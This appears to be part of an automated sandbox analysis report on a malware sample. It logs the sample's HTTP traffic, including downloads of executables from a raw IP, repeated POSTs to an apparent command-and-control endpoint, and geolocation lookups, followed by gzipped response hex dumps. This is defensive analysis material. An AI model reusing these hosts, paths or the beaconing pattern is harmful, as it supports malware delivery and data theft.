      Source: global trafficHTTP traffic detected: GET /WW/file7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file6.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60viewport-width: 1920Host: ip-api.com
      Source: global trafficHTTP traffic detected: GET /start/?v=2000 HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /start/css/screen.css?1=1 HTTP/1.1Accept: */*Referer: http://www.browzar.com/start/?v=2000Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /start/css/ie8.css HTTP/1.1Accept: */*Referer: http://www.browzar.com/start/?v=2000Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /start/images/browzar-logo.png HTTP/1.1Accept: */*Referer: http://www.browzar.com/start/?v=2000Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /start/css/ie7.css HTTP/1.1Accept: */*Referer: http://www.browzar.com/start/?v=2000Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60viewport-width: 1920Host: ip-api.com
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar)Host: www.browzar.comConnection: Keep-AliveCookie: __utma=175377393.1983812090.1624479776.1624479776.1624479776.1; __utmb=175377393.1.10.1624479776; __utmc=175377393; __utmz=175377393.1624479776.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
      Source: global trafficHTTP traffic detected: GET /seemorebty/il.php?e=md8_8eus HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9Referer: https://www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 101.36.107.74
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: uyg5wye.2ihsfa.com
      Source: global trafficHTTP traffic detected: POST /api/?sid=87819&key=00a1b912da62d35571d16217e9d5ff8f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 266Host: uyg5wye.2ihsfa.com
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 185.20.227.194
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01250360 __aulldiv,__aulldiv,__aulldiv,__aulldiv,lstrlenA,GetProcessHeap,HeapAlloc,lstrcpynA,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetOpenA,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetOpenUrlA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetReadFile,InternetReadFile,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetCloseHandle,InternetCloseHandle,
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveContent-Type: text/html; charset=UTF-8Content-Length: 1468Content-Encoding: gzipVary: Accept-EncodingDate: Wed, 23 Jun 2021 20:22:55 GMTServer: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 56 dd 6e 1b b7 12 be 8e 01 bf c3 98 07 a9 1d 54 bb 94 ac da 89 ed 5d 19 89 ed c0 e9 6f da 2a c8 29 82 20 18 71 47 2b da 14 b9 21 b9 92 b7 e8 c3 17 dc 1f 79 d5 38 e9 39 68 f7 42 22 39 9c 6f 66 3e 0e 39 93 ec 5d fe 74 31 fd ed f5 15 2c fc 52 c1 eb 37 2f be 7f 75 01 2c e2 fc ed f8 82 f3 cb e9 25 fc f7 7a fa c3 f7 30 8a 87 30 b5 a8 9d f4 d2 68 54 9c 5f fd c8 80 2d bc 2f 4e 39 5f af d7 f1 7a 1c 1b 9b f3 e9 2f fc 2e 60 8d 82 72 3b 8c 7c 4f 33 ce 7c c6 26 bb 3b 49 6d f1 6e a9 b4 4b 1f c0 19 9d 9c 9c 34 ea 0c ee 96 ea 54 a1 ce 53 46 9a c1 66 54 83 10 66 20 b3 94 09 af 86 c3 0f cd ef 35 61 36 0a 36 00 00 12 2f bd a2 c9 0b 6b d6 bf a3 85 3f e0 37 53 5a 28 ac 5c a1 27 58 4b 9d 99 35 18 0d 7e 41 f0 96 66 09 6f f6 b7 ca 4b f2 08 21 ca 88 3e 96 72 95 b2 0b a3 3d 69 1f 4d ab 82 18 88 66 96 32 4f 77 9e 87 88 ce 40 2c d0 3a f2 69 e9 22 74 42 4a 06 bc 73 a5 46 d3 b8 a4 94 ad 24 ad 0b 63 7d 0f 63 2d 33 bf 48 33 5a 49 41 51 3d 39 03 a9 a5 97 a8 22 27 50 51 3a 8a 87 67 9b b8 7a 60 97 e4 84 95 45 38 9a 1e de a5 d1 fb 1e 72 f2 20 b0 cc 17 1e 4c e9 21 82 d2 11 b4 6c c4 70 85 ae 02 6f c2 e2 00 a6 c6 a3 82 d7 81 1a 51 0d e0 8d 23 90 1e 50 57 eb 05 59 8a 61 8a b7 e4 c0 91 30 3a 73 41 2b 33 6b ad 0c 66 03 d0 06 2c e5 d2 79 8b c1 8b 01 dc 94 ce 6f e4 80 3a 83 dc c4 0f 53 f1 1d 55 6b 63 33 d7 73 bd f5 a1 f6 d3 91 1d 6c ce 6b 66 cd da 49 9d 0f a0 1e 91 0d 96 a5 76 1e 95 6a 2d d7 ba 9e e0 95 f6 64 35 f9 6e e7 00 de 1a 7b bb 41 da 88 5b 2e 06 4d e0 9e e0 d7 d2 ce 07 f0 2b ce 09 50 1b 5d 2d 4d e9 1a 90 2f 1b d6 06 16 d2 79 63 ab 9a 0f 2c bd 89 84 59 16 8a 3c d5 2b c2 98 5b 49 f7 fe 68 03 02 c5 a2 b7 12 7c 71 b4 49 cf 7b 9f 5a c1 a0 3b b9 66 e0 d0 3e 4c e9 2f 66 66 7c 9f 50 a9 33 ba 1b cc 8d 52 66 dd 53 69 d2 06 9c 15 9b 3b 88 37 78 17 e7 c6 e4 8a b0 90 2e 16 66 c9 c3 1a 57 72 e6 f8 cd c7 92 6c c5 47 f1 71 fc 4d 3b 89 97 52 c7 37 8e 81 af 0a 6a 6f c2 0d ae b0 c1 66 93 84 37 a3 ee 12 28 a9 6f 61 61 69 9e b2 98 0b e7 82 98 48 c7 c2 b9 f3 51 3a 62 60 49 a5 cc f9 4a 91 5b 10 f9 2d 60 e1 dc a7 ee 67 e8 31 c2 2c 12 4a 92 f6 29 13 18 15 e5 2c 3a 3e 1a 0d 4f 86 a3 e1 f1 f0 f0 d9 f1 b3 c3 11 03 74 95 16 f7 d1 ba 53 ce 0b cc 09 b3 c3 36 62 57 e9 4c 8a 3a 91 ea c0 1b 29 bf 71 1c 33 37 ab 1a 5a 42 b0 9f 44 b5 17 45 ef e4 1c 5e 5d c1 f1 fb cf 46 2a e9 38 84 f9 ff 84 b8 f7 8e 74 26 e7 ef a3 a8 43 6d 2d a9 90 e2 57 f0 f4 4b d6 9e fe 6b d6 f2 c6 da b3 2f 59 7b f6 8f ac ed ee ec ee 24 6d 3e 3e 70 4e c2 51 7b 46 f5 c1 84 e9 8d 3b 17 77 69 36 1e 13 9d cc 9e 1e 1d 1d 89 d1 9c 48 6c 9d cd ee 4e c2 17 84 59 a8 15 33 93 55 93 60 e6 d1 a3 24 93 2b 10 0a 9d 4b d9 bc 54 ca 9b 62 86 36 3c ad 8f c2 97 94 aa 93 3a e9 29 64 ac eb 84 89 92 93 04 db 04 e6 b7 54 cd 09 7d 69 c9 c5 c5 a2 60 50 57 8f 94 7d 47 15 bc 6c 05 6c d2 9f 25 1c 27 09 57 b2 b5 b5 0d b7 20 55 6c e1
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveCache-Control: public, max-age=604800Expires: Wed, 30 Jun 2021 20:22:55 GMTContent-Type: text/cssLast-Modified: Sun, 20 Jun 2021 08:53:21 GMTAccept-Ranges: bytesContent-Encoding: gzipVary: Accept-EncodingContent-Length: 5772Date: Wed, 23 Jun 2021 20:22:55 GMTServer: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 3d db 8e db b8 92 cf 09 90 7f e0 41 10 9c 24 b0 d5 92 5a 76 db dd 2f 3b 99 cb ee 3e 2d b0 03 9c 57 83 b6 68 59 a7 65 51 d1 a5 ed 9e 41 fe 7d c1 ab 78 97 9c cc 6c 07 33 68 cb 25 56 b1 58 55 ac 1b d9 a7 fe 5c 2d c0 50 2d 00 ae 16 a0 2a 17 e0 94 2c c0 29 5d 80 d3 fd 02 9c b2 05 38 ad 16 e0 b4 5e 80 23 6e cf 0b 70 2c 51 95 77 a8 5f 00 b8 00 e5 b9 58 80 7d 85 0f cf 5f 07 dc a3 05 68 de bd fd f3 dd db 37 67 d8 16 65 fd 08 e2 a7 77 6f df 34 30 cf cb ba e0 9f f6 b8 cd 51 cb 3e 7c 7b f7 f6 dd db 3d ce 5f d9 5b 3d ba f6 4b 58 95 45 fd 08 0e a8 ee 51 4b 5e 38 e0 0a b7 8f e0 7d 4c 7f e8 10 f0 f0 5c b4 78 a8 f3 a5 f8 f2 37 fa f3 a4 a2 06 70 e8 31 79 72 c4 75 bf 3c c2 73 59 bd 3e 02 d8 96 b0 5a bc a0 36 87 35 5c fc 0e eb 6e d9 a1 b6 3c 4a c0 ae fc 03 3d 82 87 d5 07 41 df dd 67 d0 c3 02 74 fd 6b 85 3a f0 f9 ee dd db d3 3d a3 57 a5 6c bb 35 46 48 a2 0c 9d c5 18 a7 6c d6 1b a9 f2 c6 ca 7a 23 08 be d6 c1 b7 db d8 ff 06 7b 76 41 65 71 ea 1f 41 8d db 33 ac 6e 62 94 e0 71 12 37 d7 71 21 f9 da 57 65 8d 96 27 3e b8 e0 82 93 8c 71 a9 62 90 ac d4 a1 e0 63 55 d6 cf 0b 00 1f 5f ca ae ec 51 ee 61 1f 05 ae 50 81 6a 0e 91 97 5d 53 c1 57 32 ab 1a 09 80 6e 68 b4 f7 ff 17 e5 e3 e2 fe 56 5e 51 07 08 d1 a0 6b e0 a1 ac 0b 50 76 dd 80 3a 70 39 a1 1a 0c 1d 79 d2 0d 0d 11 02 b2 f8 91 1c 4d 99 52 1c 6d d8 94 1a dc 95 7d 89 eb 47 d0 a2 0a f6 e5 0b 21 e2 4d 8f 9b 47 b0 8c a3 35 03 aa d0 b1 e7 da 60 53 54 c1 3d aa 2c 04 da 62 df 7d 2e 50 8d da f2 00 0e 15 ec 3a 26 9a 54 32 a3 b2 26 0c db 57 28 c0 8e e8 58 61 d8 b7 64 81 38 1e f2 f9 11 d0 27 3a 10 a1 54 83 21 0f 24 c8 1e 57 b9 42 a9 10 28 f2 58 c2 1c 2a 04 5b ce 7d f2 2b f9 ba 3f c9 af 99 f0 91 d7 c3 53 8e 86 3a 47 2d 59 25 c5 54 e4 e8 80 5b c8 d8 2d bf 1f 99 84 fb 13 6a 55 e6 10 49 ba b4 b0 69 10 a7 e8 52 e6 fd 89 28 7b dc 5c 9f 0c 03 c4 67 3a ca 3a 11 50 6e 52 18 49 15 2e 30 11 53 36 d6 68 94 1e c1 d0 56 1f a3 e8 ae 3c c3 02 75 77 04 2e fa 77 53 7c 02 35 5e b6 a8 41 90 0e 2c d7 86 da cf a7 91 9c 74 95 30 72 84 12 ad d7 ec b3 6b 0d 7a 58 8c 5c d1 b8 b7 76 e8 3a 5f 1a 7d 52 44 fd e2 27 5b 0e f8 82 e9 62 51 c3 97 b2 a0 3c d7 38 e9 9f 3d aa f3 dd 01 36 06 03 46 24 fa a4 ac 25 d1 4d 0d b8 d7 2c 0e ae a2 1e 37 23 49 2e 51 95 23 66 7c 44 3f a9 7b d8 46 45 79 fc 04 18 8d cb ab 0f 0f a8 4a 61 eb ba 7e 49 25 6c d9 bf 36 48 ea d9 b8 b8 65 cd 85 d2 b5 7a 8e 71 01 8c 4e f8 8c c8 6e ec fa 2e c7 97 ba c2 30 f7 7d 7f 44 b0 1f 5a d4 f9 be 3f a1 aa f1 7d 77 c0 e7 b2 2e 3a 8c 6b ef e8 6d 89 6a 2f ee 03 ae 7b 78 e8 7d 5f f7 18 57 7b 61 0b 6c e1 17 c2 9e 3e 34 21 be 73 fe 4c 49 1d 81 61 6b a9 e9 1c 97 85 f5 fd 14 0e c1 e7 29 3c 02 ae f3 23 db 4c 4e 48 2c da 14 b2 67 f4 ba 13 b0 7e 7c 4
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveCache-Control: public, max-age=604800Expires: Wed, 30 Jun 2021 20:22:55 GMTContent-Type: text/cssLast-Modified: Sat, 19 Jun 2021 10:07:42 GMTAccept-Ranges: bytesContent-Encoding: gzipVary: Accept-EncodingContent-Length: 193Date: Wed, 23 Jun 2021 20:22:55 GMTServer: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 65 8f 4d 0a c2 30 10 46 d7 06 72 87 01 77 85 fe 48 45 21 5d 79 94 b4 49 d3 40 9a 84 74 d4 80 78 32 17 1e c9 2b 48 6a db 8d db 61 de e3 7d 9f d7 5b e8 5b a1 9c 53 46 b6 0a 8a 49 f2 d0 0d 28 23 b6 2e c2 83 92 bb 16 38 b0 fa 54 fb d8 50 32 f2 a0 b4 cd 8d ec 91 1d 7c 6c 9e 94 50 b2 e2 57 44 67 13 d3 1b c7 91 05 ad 06 dc 98 f4 0e b5 8f 50 41 b5 82 65 06 17 21 00 07 3d 41 e7 2c 06 67 20 2b 29 d9 73 21 d2 b1 c5 31 e9 76 29 27 e7 46 2b bb 49 77 4b 09 3a cf ce c7 b9 6d 56 a6 35 bf 0d a9 ff 7f 0e 00 80 e7 42 68 ab 66 16 16 f6 0b 59 9a 58 69 09 01 00 00 Data Ascii: eM0FrwHE!]yI@tx2+Hja}[[SFI(#.8TP2|lPWDgPAe!=A,g +)s!1v)'F+IwK:mV5BhfYXi
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveCache-Control: public, max-age=604800Expires: Wed, 30 Jun 2021 20:22:56 GMTContent-Type: text/cssLast-Modified: Sat, 19 Jun 2021 10:07:42 GMTAccept-Ranges: bytesContent-Encoding: gzipVary: Accept-EncodingContent-Length: 473Date: Wed, 23 Jun 2021 20:22:56 GMTServer: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 55 52 db 8e db 20 10 7d 5e 4b fe 87 91 f2 b0 ed 4a 26 ce a5 db 0d 79 6a 7f 24 c2 61 82 51 30 83 00 27 6e a3 fc 7b 85 2f b1 eb c7 c3 cc b9 79 58 83 b6 85 d6 80 d1 ec ae ad a4 7b 38 7c c1 23 cf 9c 90 52 5b 55 44 72 7c 53 ba ee 98 67 95 38 5f 95 a7 d6 4a de 7a f3 8d b1 b5 6e 84 c2 b0 1e 17 4f 87 af 93 21 45 a7 aa 8d 91 2c 53 fa f2 1d 2c 15 1e 1d 8a 08 db d2 75 b0 d9 ba ee f8 cc b3 3c 63 01 85 3f d7 15 75 60 74 52 6c 84 57 da f2 12 36 ae 83 12 ca 61 cc b1 86 3c 3a 21 e7 91 de d3 f6 c7 44 24 f5 8d 85 28 7c 04 96 d4 17 73 15 c5 48 0d 1f 99 04 0b 35 b5 46 de b0 46 21 d1 2f 34 3f 77 bd 64 ca 39 e9 b2 4b 6b cc 05 45 6c 3d 06 a3 ed 35 8d 5f 0c 89 c8 0d 5e e2 2c ad 88 94 c1 4a c1 18 28 62 17 53 a8 47 9e dd b5 8c 35 df 25 f6 e3 4b ab 18 e3 bd 84 46 82 be b3 59 c4 6b 55 c7 79 6b ef 3a 38 2c 7b 59 7f c0 2f 29 21 d6 3a c0 99 6c f4 64 e0 63 9d 67 2b 21 65 02 ab d8 24 b2 b7 64 a7 10 46 2b fb a2 7c 5b d4 f8 73 df 7b 7b 8e 35 f6 09 9c b0 68 2a 05 ab d0 2a 85 21 92 8b 9a 6c 78 e4 19 00 40 4a cf f7 9f d3 9a 98 fe e3 cb 7f 1a 92 3a 38 23 fe 70 a8 0c 9d af c7 01 74 14 74 62 e2 e0 d1 88 a8 6f 38 3e fc 2d b4 95 d8 71 d8 94 e5 08 0d 25 c0 64 39 41 43 9b b0 db f6 d2 09 a9 31 3d ff 07 8d 75 41 b1 4b 6d 15 fd cd 95 50 be de c7 b3 